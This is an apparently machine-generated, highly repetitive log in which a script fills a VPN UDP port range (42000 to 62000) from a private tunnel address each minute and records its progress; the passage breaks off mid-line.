+Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:32:04 +Starting port fill at 2020-09-06 11:33:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:33:05 +Starting port fill at 2020-09-06 11:34:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 11:34:06 +Starting port fill at 2020-09-06 11:35:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:35:05 +Starting port fill at 2020-09-06 11:36:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:36:05 +Starting port fill at 2020-09-06 11:37:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:37:04 +Starting port fill at 2020-09-06 11:38:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:38:04 +Starting port fill at 2020-09-06 11:39:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 11:39:07 +Starting port fill at 2020-09-06 11:40:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:40:05 +Starting port fill at 2020-09-06 11:41:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:41:04 +Starting port fill at 2020-09-06 11:42:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:42:05 +Starting port fill at 2020-09-06 11:43:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:43:06 +Starting port fill at 2020-09-06 11:44:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 11:44:07 +Starting port fill at 2020-09-06 11:45:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 11:45:07 +Starting port fill at 2020-09-06 11:46:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:46:06 +Starting port fill at 2020-09-06 11:47:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 11:47:07 +Starting port fill at 2020-09-06 11:48:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:48:06 +Starting port fill at 2020-09-06 11:49:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:49:04 +Starting port fill at 2020-09-06 11:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:50:04 +Starting port fill at 2020-09-06 11:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:51:05 +Starting port fill at 2020-09-06 11:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:52:05 +Starting port fill at 2020-09-06 11:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:53:04 +Starting port fill at 2020-09-06 11:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:54:04 +Starting port fill at 2020-09-06 11:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:55:04 +Starting port fill at 2020-09-06 11:56:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 11:56:06 +Starting port fill at 2020-09-06 11:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:57:05 +Starting port fill at 2020-09-06 11:58:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 